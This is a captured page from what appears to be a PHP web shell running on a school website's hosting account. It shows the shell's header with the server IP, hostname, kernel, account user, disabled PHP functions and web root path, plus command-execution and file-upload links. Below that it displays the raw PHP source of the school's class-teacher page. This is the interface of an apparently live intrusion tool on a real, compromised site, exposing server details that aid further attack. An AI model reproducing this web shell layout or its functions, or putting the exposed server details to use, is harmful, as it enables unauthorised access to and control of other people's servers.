Server IP : 86.38.243.181 / Your IP : 216.73.216.51 Web Server : LiteSpeed System : Linux in-mum-web1336.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 User : u986601745 ( 986601745) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u986601745/domains/emrskalsi.com/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en" style="overflow-x: hidden;"> <head> <meta http-equiv="content-type" content="text/html;charset=UTF-8" /> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Eklavya Model Residential School - Class Teacher</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Meet the dedicated class teachers at Eklavya Model Residential School Kalsi, Dehradun. Learn about their qualifications, experience, and commitment to nurturing and educating tribal students."> <meta name="keywords" content="Eklavya Model Residential School Class Teacher, Class Teachers EMRS Kalsi, Teaching Staff EMRS Dehradun, Tribal School Teachers, EMRS Faculty, Dedicated Educators at EMRS, Teacher Profiles Kalsi, EMRS Teaching Team, Tribal Education Staff, Class Teachers Uttarakhand"> <meta property="og:title" content="Eklavya Model Residential School - Class Teacher" /> <meta property="og:description" content="Meet the dedicated class teachers at Eklavya Model Residential School Kalsi, Dehradun. Learn about their qualifications, experience, and commitment to nurturing and educating tribal students." /> <meta property="og:image" content="https://emrskalsi.com/images/logo.png" /> <meta property="og:url" content="https://emrskalsi.com/class-teacher.php" /> <?php include('include/header.php'); ?> <div class="breadcrumbs"> <div class="container"> <!-- <h1 class="pull-left"> Class Teacher</h1> --> <ul class="pull-left breadcrumb"> <li><a href="javascript:void(0)">Academics</a></li> <li><a href="javascript:void(0)">Class Teacher</a></li> </ul> <div class="brs"> <button type="button" class="print-gigw" onclick="printDiv('pr')" value="print a div!" ><i class="fa fa-print" aria-hidden="true"></i> </button> <script> function printDiv(pr) { var printContents = document.getElementById(pr).innerHTML; var originalContents = document.body.innerHTML; document.body.innerHTML = printContents; window.print(); document.body.innerHTML = originalContents; } </script> </div> </div> </div> </div> <style>.menshow{display:block !important}</style> </div></div><section class="cls_teachers" id="pr"> <div class="container-fluid row"><div class="col-xs-12" ><div class="ap-section "> <div class="headline" id="headlines"><h2 >List of class teachers Session : 2022-23</h2> </div> <div class="ap-plain" > <div > <table class="table table-bordered"> <thead> <tr> <th>SL No</th> <th>Class</th> <th colspan="2">Class teacher</th> </tr> <tr> <th> </th> <th> </th> <th>Name</th> <th>Designation</th> </tr> </thead> <tbody> <?php $q = "select * from teachers"; $query = mysqli_query($conn,$q); $i=1; while($res = mysqli_fetch_array($query)) { ?> <tr> <td><?php echo $i++; ?></td> <td><?php echo $res['class']; ?></td> <td><?php echo $res['teacher_name']; ?></td> <td><?php echo $res['designation']; ?></td> </tr> <?php } ?> </tbody> </table> <p style="text-align: right;"><strong><em> </em>(Mr. Rajneesh Saroha) </strong></p> <p style="text-align: right;"><strong>Principal</strong></p></div> </div> </div></div></div> </section> <?php include('include/footer.php'); ?>